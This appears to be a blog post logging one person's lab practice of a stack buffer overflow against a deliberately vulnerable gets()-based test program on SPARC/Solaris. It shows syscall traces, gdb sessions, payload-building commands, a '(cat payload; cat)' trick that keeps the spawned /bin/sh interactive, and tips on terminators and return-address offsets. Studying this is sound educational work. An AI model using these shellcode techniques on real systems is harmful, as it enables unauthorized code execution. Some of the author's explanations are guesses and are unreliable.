stat("/usr/lib/libgen.so.1", 0xFFBEF828)        = 0
resolvepath("/usr/lib/libgen.so.1", "/usr/lib/libgen.so.1", 1023) = 20
open("/usr/lib/libgen.so.1", O_RDONLY)          = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x0393CD50, 98304, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000
mmap(0xFF370000, 23073, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000
mmap(0xFF386000, 2335, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 24576) = 0xFF386000
munmap(0xFF376000, 65536)                       = 0
memcntl(0xFF370000, 6932, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libc.so.1", 0xFFBEF828)          = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY)            = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x13ABB888, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000
mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000
mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000
munmap(0xFF32C000, 65536)                       = 0
memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF828)         = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY)           = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x1312EF40, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF360000
mmap(0xFF360000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF360000
close(3)                                        = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF540) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF350000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF270000
mmap(0xFF270000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF270000
close(3)                                        = 0
munmap(0xFF390000, 8192)                        = 0
getpid()                                        = 2098 [2097]
getpgid(2098)                                   = 2097
getsid(2098)                                    = 1819
brk(0x0003A108)                                 = 0
sysconfig(_CONFIG_SIGRT_MIN)                    = 38
sysconfig(_CONFIG_SIGRT_MAX)                    = 45
sigaltstack(0xFFBEFE5C, 0x00000000)             = 0
sigaction(SIGHUP, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGHUP, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGINT, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGINT, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGQUIT, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGQUIT, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGILL, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGILL, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGTRAP, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGTRAP, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGABRT, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGABRT, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGEMT, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGEMT, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGFPE, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGFPE, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGBUS, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGBUS, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGSEGV, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGSYS, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGSYS, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGPIPE, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGPIPE, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGALRM, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGALRM, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGTERM, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGTERM, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGUSR1, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGUSR1, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGUSR2, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGUSR2, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGPWR, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGPWR, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGURG, 0x00000000, 0xFFBEFDD8)       = 0
sigaction(SIGURG, 0xFFBEFD38, 0xFFBEFDB8)       = 0
sigaction(SIGPOLL, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGPOLL, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGVTALRM, 0x00000000, 0xFFBEFDD8)    = 0
sigaction(SIGVTALRM, 0xFFBEFD38, 0xFFBEFDB8)    = 0
sigaction(SIGPROF, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGPROF, 0xFFBEFD38, 0xFFBEFDB8)      = 0
sigaction(SIGXCPU, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGXFSZ, 0x00000000, 0xFFBEFDD8)      = 0
sigaction(SIGRTMIN, 0xFFBEFD38, 0xFFBEFDB8)     = 0
sigaction(SIGRTMIN+1, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMIN+2, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMIN+3, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMAX-3, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMAX-2, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMAX-1, 0xFFBEFD38, 0xFFBEFDB8)   = 0
sigaction(SIGRTMAX, 0xFFBEFD38, 0xFFBEFDB8)     = 0
getuid()                                        = 100 [100]
getuid()                                        = 100 [100]
getgid()                                        = 10 [10]
getgid()                                        = 10 [10]
getuid()                                        = 100 [100]
ioctl(0, TCGETS, 0x000391B0)                    Err#25 ENOTTY
$ write(2, " $  ", 2)                           = 2
read(0, 0x000394D0, 128)                        = 0
fcntl(0, F_GETFL, 0x00000000)                   = 8192
fstat64(0, 0xFFBEFC28)                          = 0
ioctl(0, TCGETA, 0xFFBEFD7C)                    Err#25 ENOTTY
close(0)                                        = 0
llseek(0, 0, SEEK_CUR)                          Err#9 EBADF
_exit(0)
-bash-4.3$

I finally start to put 2 and 2 together…

$PWD/invoke2 v < payload

The above snippet was the problem.. Since I was piping from the file.. when the shell gets spawned it’s just like;; “I GUESS IM FINISHED HERE.. EOF”..

Here’s my temporary happiness inspired from http://stackoverflow.com/questions/8509045/execve-bin-sh-0-0-in-a-pipe
Here’s a temporary solution

    without

the beauty of raw tty (you may have to hit enter once at the beginning and again after doing an ‘exit’:

Notes
The difference between invoking /bin/sh -i and simply only /bin/bash is that -i adds automatically the $ prompt. I could not find a way to set the prompt manually when only using /bin/sh thru cat without -i.

Here’s an example of the exploit running, which it does an execve /bin/sh -i

# anything enclosed in [] is note from me added after execution

-bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin
-bash-4.3$ (cat payload; cat) | $PWD/invoke2 v
sp = 0xffbefdb8
[hangs here until you hit enter key, probably an incident of using cat and cooked input]
$ ls
alternating_payload2       asmshell2.bin              exec                       payload3                   v2
alternating_payload2.c     asmshell3.bin              howto_a_payload            payload_asmshell6          v2.c
alternating_payload3       asmshell4.bin              invoke2                    payload_fix_fp             write_raw.bin
alternating_payload3.c     asmshell5_interactive.bin  ksh_shellcode              payload_trashed_fp
asm                        asmshell6.bin              magic_crash_length         readme.txt
asm_tcsh.bin               build_shellcode_steps      payload                    v
asmshell.bin               core                       payload2                   v.c
$ exit
[hangs here until you hit enter key again, probably an incident of using cat and cooked input]
-bash-4.3$

Figure out how much space there is until overflow into Libc (that’s bad)

(gdb) q
-bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin; ./alternating_payload2 1024 >> payload; printf "\x00" >> payload
-bash-4.3$ $PWD/invoke2 -d v
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(gdb) b 16
Breakpoint 1 at 0x10750: file v.c, line 16.
(gdb) r < payload
Starting program: /home/bazz/latest/v < payload
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
sp = 0xffbefda0

Program received signal SIGSEGV, Segmentation fault.
0xff2c3064 in memccpy () from /usr/lib/libc.so.1
(gdb)

Only logical explanation is that the buffer needs to be shortened. It must be overwriting libc, or some SUPER out of bounds area… maybe completely went off the charts.. IONNO I try to understand it but it isn’t working so I just cut the buffer down. Actually I just learned. using pmap tools and trialing the buffer size, the fact is that the stack is allocated 8K from FFBEE000 8K read/write/exec [ stack ]
FFBEE000 + 8k (0x2000) = 0xFFBF0000
which is past the page boundary..

(gdb)
0xffbeff80:     0x03424242      0x03434343      0x03444444      0x03454545
0xffbeff90:     0x03464646      0x03474747      0x03484848      0x03494949
0xffbeffa0:     0x034a4a4a      0x034b4b4b      0x034c4c4c      0x034d4d4d
0xffbeffb0:     0x034e4e4e      0x034f4f4f      0x03505050      0x03515151
0xffbeffc0:     0x03525252      0x03535353      0x03545454      0x03555555
0xffbeffd0:     0x03565656      0x03575757      0x03585858      0x03595959
0xffbeffe0:     0x035a5a5a      0x04414141      0x04424242      0x04434343
0xffbefff0:     0x04444444      0x04454545
(gdb)
0xffbefff8:     0x04464646      0x04470000      Cannot access memory at address 0xffbf0000
(gdb)

NOTE!! When exploiting gets(), it is IMPERTINENT to use a 0x0a rather than null byte. is it the leading role in string termination.. I didn’t do that above and it led to hairy things.. I had to hit enter myself causing a \r\n which is why the last 2 bytes are 0000, that was space needed for \r\n I assume.. you can rid this by using 0x0a in your buffer.

in the scheme of exploiting apply, the program can be spawned an unlimited number of times.

To get really sweet, it’s time to open our own TTY to “write” our shellcode through and eventually our own terminal to directly operate with the shell on the other end :)

    Notes On my blade 150

$18 byte difference between debug and production return address offset. This difference does not exist on school production servers.
i.e.
e50 # debug return address – 8
e68 # production return address – 8

To-Do:
Add in a sweet nop-slide
Then find a suitable backoff limit, and fill with nops

Posted in Bash, buffer overflow, Sparc/Solaris
Skip to toolbar